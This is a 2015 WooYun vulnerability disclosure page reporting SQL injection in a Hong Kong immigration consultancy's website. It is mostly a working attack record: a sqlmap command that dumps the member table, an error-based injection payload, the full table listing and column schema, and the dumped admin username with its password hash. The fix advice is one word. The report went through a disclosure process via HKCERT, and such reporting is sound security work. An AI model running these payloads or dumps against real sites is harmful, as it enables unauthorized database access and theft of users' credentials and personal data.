当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0156884

漏洞标题:御国天下移民顾问有限公司主站存在SQL注射漏洞(管理密码泄露)(香港地區)

相关厂商:御国天下移民顾问有限公司

漏洞作者: 路人甲

提交时间:2015-12-01 11:35

修复时间:2016-01-16 11:00

公开时间:2016-01-16 11:00

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(hkcert香港互联网应急协调中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-12-01: 细节已通知厂商并且等待厂商处理中
2015-12-02: 厂商已经确认,细节仅向厂商公开
2015-12-12: 细节向核心白帽子及相关领域专家公开
2015-12-22: 细节向普通白帽子公开
2016-01-01: 细节向实习白帽子公开
2016-01-16: 细节向公众公开

简要描述:

御国天下移民顾问有限公司主站存在SQL注射漏洞(管理密码泄露)

详细说明:

地址:http://**.**.**.**/about.php?aid=9

$ python sqlmap.py -u "http://**.**.**.**/about.php?aid=9" -p aid --technique=BE --random-agent --batch  -D worldvisa -T php_members -C username,password,qq,telephone,email,alipay,mobile --dump

漏洞证明:

---
Parameter: aid (GET)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: aid=9' AND (SELECT 8311 FROM(SELECT COUNT(*),CONCAT(0x71626a6b71,(SELECT (ELT(8311=8311,1))),0x7171626271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'knoB'='knoB
---
web application technology: Apache
back-end DBMS: MySQL 5.0
current user:    'worldvisa_f@localhost'
current user is DBA:    False
database management system users [1]:
[*] 'worldvisa_f'@'localhost'
Database: worldvisa
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| php_product                           | 292     |
| php_product_dir                       | 102     |
| php_service                           | 33      |
| php_menu                              | 15      |
| php_link                              | 12      |
| php_down_dir                          | 9       |
| php_feedback                          | 9       |
| php_comment_list                      | 7       |
| php_mpb                               | 7       |
| php_article_dir                       | 6       |
| php_article_include                   | 6       |
| php_photo_dir                         | 6       |
| php_about                             | 5       |
| php_groups                            | 5       |
| php_about_include                     | 3       |
| php_case_include                      | 3       |
| php_down                              | 3       |
| php_news                              | 3       |
| php_news_dir                          | 3       |
| php_news_include                      | 3       |
| php_plugins                           | 3       |
| php_product_include                   | 3       |
| php_article                           | 2       |
| php_article_dir_include               | 2       |
| php_blog_logs                         | 2       |
| php_blog_logs_dir                     | 2       |
| php_blog_photo_dir                    | 2       |
| php_down_dir_include                  | 2       |
| php_down_include                      | 2       |
| php_link_include                      | 2       |
| php_mpb_dir                           | 2       |
| php_person                            | 2       |
| php_photo                             | 2       |
| php_product_orders                    | 2       |
| php_stat                              | 2       |
| php_about_setup                       | 1       |
| php_ad                                | 1       |
| php_blog_logs_dir_include             | 1       |
| php_blog_logs_include                 | 1       |
| php_blog_setup                        | 1       |
| php_case                              | 1       |
| php_case_dir                          | 1       |
| php_case_dir_include                  | 1       |
| php_comment                           | 1       |
| php_contact                           | 1       |
| php_contact_include                   | 1       |
| php_guest                             | 1       |
| php_members                           | 1       |
| php_mpb_dir_include                   | 1       |
| php_mpb_include                       | 1       |
| php_news_dir_include                  | 1       |
| php_person_include                    | 1       |
| php_photo_dir_include                 | 1       |
| php_photo_include                     | 1       |
| php_product_dir_include               | 1       |
| php_resource                          | 1       |
| php_resource_dir                      | 1       |
| php_resource_dir_include              | 1       |
| php_resource_include                  | 1       |
| php_service_include                   | 1       |
| php_setup                             | 1       |
| php_smtpmail                          | 1       |
+---------------------------------------+---------+
Database: information_schema
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| COLUMNS                               | 1671    |
| SESSION_VARIABLES                     | 329     |
| GLOBAL_VARIABLES                      | 317     |
| GLOBAL_STATUS                         | 312     |
| SESSION_STATUS                        | 312     |
| STATISTICS                            | 229     |
| COLLATION_CHARACTER_SET_APPLICABILITY | 197     |
| COLLATIONS                            | 197     |
| PARTITIONS                            | 115     |
| TABLES                                | 115     |
| KEY_COLUMN_USAGE                      | 75      |
| TABLE_CONSTRAINTS                     | 75      |
| CHARACTER_SETS                        | 39      |
| PLUGINS                               | 23      |
| SCHEMA_PRIVILEGES                     | 18      |
| ENGINES                               | 9       |
| SCHEMATA                              | 2       |
| PROCESSLIST                           | 1       |
| USER_PRIVILEGES                       | 1       |
+---------------------------------------+---------+


Database: worldvisa
Table: php_product
[292 entries]


---
Parameter: aid (GET)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: aid=9' AND (SELECT 8311 FROM(SELECT COUNT(*),CONCAT(0x71626a6b71,(SELECT (ELT(8311=8311,1))),0x7171626271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'knoB'='knoB
---
web application technology: Apache
back-end DBMS: MySQL 5.0
Database: worldvisa
Table: php_members
[38 columns]
+--------------+-----------------------+
| Column       | Type                  |
+--------------+-----------------------+
| address      | varchar(150)          |
| adminid      | tinyint(1)            |
| alipay       | varchar(80)           |
| available    | tinyint(2)            |
| avatar       | varchar(150)          |
| bday         | varchar(10)           |
| bmonth       | varchar(10)           |
| byear        | varchar(10)           |
| city         | varchar(50)           |
| content      | text                  |
| credits      | int(10)               |
| edulevel     | varchar(30)           |
| email        | varchar(50)           |
| gender       | tinyint(1)            |
| groupid      | smallint(6) unsigned  |
| homepage     | varchar(100)          |
| idcard       | varchar(80)           |
| idtype       | varchar(30)           |
| income       | varchar(30)           |
| industry     | varchar(30)           |
| invisible    | tinyint(1)            |
| lastactivity | int(10) unsigned      |
| lastpost     | int(10) unsigned      |
| mobile       | varchar(50)           |
| msn          | varchar(80)           |
| occupation   | varchar(30)           |
| oltime       | smallint(6) unsigned  |
| pageviews    | mediumint(8) unsigned |
| password     | varchar(32)           |
| postid       | varchar(20)           |
| posts        | mediumint(8) unsigned |
| qq           | varchar(15)           |
| regdate      | int(10) unsigned      |
| regip        | varchar(15)           |
| telephone    | varchar(50)           |
| truename     | varchar(100)          |
| uid          | mediumint(8) unsigned |
| username     | varchar(15)           |
+--------------+-----------------------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: aid (GET)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: aid=9' AND (SELECT 8311 FROM(SELECT COUNT(*),CONCAT(0x71626a6b71,(SELECT (ELT(8311=8311,1))),0x7171626271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'knoB'='knoB
---
web application technology: Apache
back-end DBMS: MySQL 5.0
Database: worldvisa
Table: php_members
[1 entry]
+----------+----------------------------------+---------+-----------+---------+---------+---------+
| username | password                         | qq      | telephone | email   | alipay  | mobile  |
+----------+----------------------------------+---------+-----------+---------+---------+---------+
| 020jt    | d6a74d5ead4c725ed869d90d5660991e | <blank> | <blank>   | <blank> | <blank> | <blank> |
+----------+----------------------------------+---------+-----------+---------+---------+---------+

修复方案:

过滤。

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:13

确认时间:2015-12-02 10:58

厂商回复:

Referred to related parties.

最新状态:

暂无

漏洞评价:

评价